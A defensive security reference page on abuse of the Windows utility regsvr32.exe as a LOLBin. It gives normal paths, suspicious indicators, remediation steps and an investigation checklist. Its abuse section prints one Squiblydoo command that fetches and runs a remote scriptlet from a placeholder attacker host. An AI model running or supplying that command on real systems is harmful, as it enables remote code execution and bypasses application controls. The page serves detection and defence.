High RiskWindowsLegitimateCommonly Abused
regsvr32.exeSYSTEM UTILITY

regsvr32.exe - COM Registration LOLBin Security Analysis

regsvr32.exe registers COM DLLs. It is a **LOLBin** abused for executing remote scripts via the /s /n /u /i switches ("Squiblydoo" technique), bypassing application controls and proxy-aware download.

Risk Summary

HIGH priority. regsvr32.exe with /i:http... is a strong IOC. Monitor for network activity and remote script execution patterns.

Overview

What is regsvr32.exe?

regsvr32.exe registers and unregisters COM DLLs.

Security Significance

  • LOLBin: Documented in LOLBAS
  • Squiblydoo: Remote script execution technique
  • Proxy-Aware: Uses system proxy for downloads
  • AppLocker Bypass: Often whitelisted

Normal Behavior

Normal Behavior

PropertyExpected Value
PathC:\Windows\System32\regsvr32.exe
Path (32-bit)C:\Windows\SysWOW64\regsvr32.exe
UsageDuring software installation

Common Locations

C:\Windows\System32\regsvr32.exeC:\Windows\SysWOW64\regsvr32.exe

Suspicious Indicators

Suspicious Indicators

IndicatorRisk
/i:http... URLCRITICAL
/s /n /u /i comboCRITICAL
scrobj.dll referenceHIGH
Network connectionsHIGH

Abuse Techniques

Attack Techniques

Squiblydoo Technique (T1218.010)

regsvr32.exe /s /n /u /i:http://evil.com/file.sct scrobj.dll

This downloads and executes a remote SCT (scriptlet) file.

Remediation Steps

  1. Block regsvr32.exe network access via firewall
  2. Monitor for /i: parameter with URLs
  3. Use Application Control to restrict DLL registration

Investigation Checklist

  • Check command line for URLs
  • Look for scrobj.dll references
  • Review network connections
  • Check for downloaded scriptlets

MITRE ATT&CK Techniques

Last verified: January 18, 2026